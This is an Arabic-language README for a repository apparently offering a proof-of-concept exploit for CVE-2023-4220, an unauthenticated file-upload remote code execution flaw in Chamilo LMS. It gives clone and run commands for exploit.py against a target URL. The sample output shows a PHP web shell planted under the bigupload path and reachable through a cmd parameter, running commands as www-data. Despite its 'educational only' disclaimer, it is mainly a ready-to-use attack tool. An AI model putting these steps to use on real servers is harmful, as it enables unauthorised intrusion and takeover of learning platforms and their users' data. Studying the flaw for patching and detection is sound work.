
(CVE-2023-4220) Chamilo LMS تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر رفع ملف كبير
يحتوي هذا المستودع على دليل إثبات المفهوم (PoC) لاستغلال الثغرة الأمنية المُحددة بالرمز CVE-2023-4220 في Chamilo LMS. يستغل هذا الاستغلال ثغرة تحميل ملف غير موثوقة، مما يسمح للمهاجمين عن بُعد بتنفيذ أكواد عشوائية على النظام المتأثر.
إخلاء مسؤولية: هذا الكود لأغراض تعليمية وبحثية فقط. المؤلف غير مسؤول عن أي استخدام خاطئ لهذا الكود.
إصدارات Chamilo LMS السابقة لهذا الإصدار معرضة لهذه المشكلة. تنشأ الثغرة من التحقق غير السليم والتعامل مع رفع الملفات، مما يسمح للمهاجمين برفع وتنفيذ ملفات خبيثة على الخادم.
يستهدف هذا الاستغلال وظيفة رفع الملفات في Chamilo LMS. من خلال صياغة ملف خبيث يحتوي على كود PHP ورفعه عبر نقطة نهاية غير موثقة، يمكن للمهاجم تنفيذ أوامر عشوائية على الخادم.
git clone https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit.git
cd Chamilo-CVE-2023-4220-RCE-Exploit
قم بتشغيل الاستغلال بتمرير عنوان URL الهدف والأمر الذي ترغب في تنفيذه كوسيطات:
python exploit.py <target_url> <command>
python3 exploit.py http://lms.target-site/ id --shell=my_shell.php
سيقوم هذا الأمر بـ:
إذا نجحت العملية، سيقوم السكريبت بإخراج:
على سبيل المثال:
[+] File uploaded successfully!
[+] Access the shell at: http://lms.target-site/main/inc/lib/javascript/bigupload/files/my_shell.php?cmd=
[+] Command Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
هذا المشروع مرخص بموجب رخصة MIT.
للاستفسارات أو المشكلات، يرجى فتح مشكلة (issue) في هذا المستودع أو الاتصال بي على [medkamelbouzekria - at - gmail -dot - com].